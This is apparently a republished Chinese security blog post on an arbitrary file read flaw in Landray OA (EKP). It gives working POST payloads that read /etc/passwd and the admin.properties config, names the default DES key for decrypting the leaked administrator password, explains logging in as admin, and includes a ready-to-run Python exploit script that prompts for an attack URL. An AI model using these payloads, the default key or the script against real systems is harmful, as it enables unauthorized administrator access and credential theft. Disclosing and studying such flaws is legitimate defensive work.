蓝凌OA任意文件读取漏洞

火山方舟向量数据库内容安全与风控

一、漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用该漏洞获取服务器敏感信息。

二、漏洞复现

访问以下接口


        
            

          /sys/ui/extend/varkind/custom.jsp
        
      

picture.image

根据返回页面可以看到是存在该接口的

然后抓包并修改为 POST 方式,并加上 payload


          
var={"body":{"file":"file:///etc/passwd"}}  针对linux服务器
          
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}  针对windows服务器
      

picture.image

picture.image

通过对比可以知道不要试完 payload 读不出来就放弃了,觉得它不存在这个漏洞,说不定这个服务器是在 windows 上呐。

这里读取的 admin.properties 配置文件可以泄露系统后台的密码

由于蓝凌 OA 默认是 DES 加密,且 默认密钥为 kmssAdminKey ,所以只要拿着响应中的 password 值进行解密就好(返回的 password 字符串去掉末尾的 /r 再进行解密)

DES 解密


        
            

          http://tool.chacuo.net/cryptdes/
        
      

picture.image

得到密码之后即可访问后台以管理员身份登入系统


        
            

          http://xx.xx.xx.xx/admin.do
        
      

picture.image

picture.image

三、POC脚本

漏洞利用脚本如下


          
#!/usr/bin/python3
          
#-*- coding:utf-8 -*-
          
import base64
          
import requests
          
import random
          
import re
          
import json
          
import sys
          

          
def title():
          
    print('+------------------------------------------')
          
    print('++++++  公众号:  守卫者安全                                                   ')
          
    print('++++++  POC名称: 蓝凌OA 任意文件读取POC                                        ')
          
    print('++++++  使用方法: python3 poc.py                                             ')
          
    print('++++++  Url      >>> http://xxx.xxx.xxx.xxx                                 ')
          
    print('+------------------------------------------')
          

          
def POC_1(target_url):
          
    vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp"
          
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Content-Type": "application/x-www-form-urlencoded"}
          
    data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
          
    #proxies = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}
          
    try:
          
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False)
          
        print("正在请求 {}/sys/ui/extend/varkind/custom.jsp ".format(target_url))
          
        if "password" in response.text and response.status_code == 200:
          
            print("成功读取 admin.properties  响应为:{} ".format(response.text))
          

          
    except Exception as e:
          
        print("请求失败:{} ".format(e))
          
        sys.exit(0)
          

          
#
          
if __name__ == '__main__':
          
    title()
          
    target_url = str(input("Please input Attack Url   >>> "))
          
    POC_1(target_url)
      

picture.image

如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell

「 超详细 | 分享 」手把手教你如何进行内网渗透

神兵利器 | siusiu-渗透工具管理套件

一款功能全面的XSS扫描器

实战 | 一次利用哥斯拉马绕过宝塔waf

BurpCrypto: 万能网站密码爆破测试工具

快速筛选真实IP并整理为C段 -- 棱眼

自动探测端口顺便爆破工具t14m4t

渗透工具|无状态子域名爆破工具(1秒扫160万个子域)

查看更多精彩内容,还请关注 橘猫学安全:

每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“ 再看”

0
0
0
0
关于作者

文章

0

获赞

0

收藏

0

相关资源
基于 Ray 的大模型离线推理
大模型离线推理,是指在具有数十亿或数万亿参数的大规模模型上进行分布式推理的过程。相较于常规模型推理,在模型切分、数据处理和数据流、提升 GPU 利用率方面面临了很大挑战。本次分享将介绍如何利用 Ray 及云原生优势助力大模型离线推理。
相关产品
评论
未登录
看完啦,登录分享一下感受吧~
暂无评论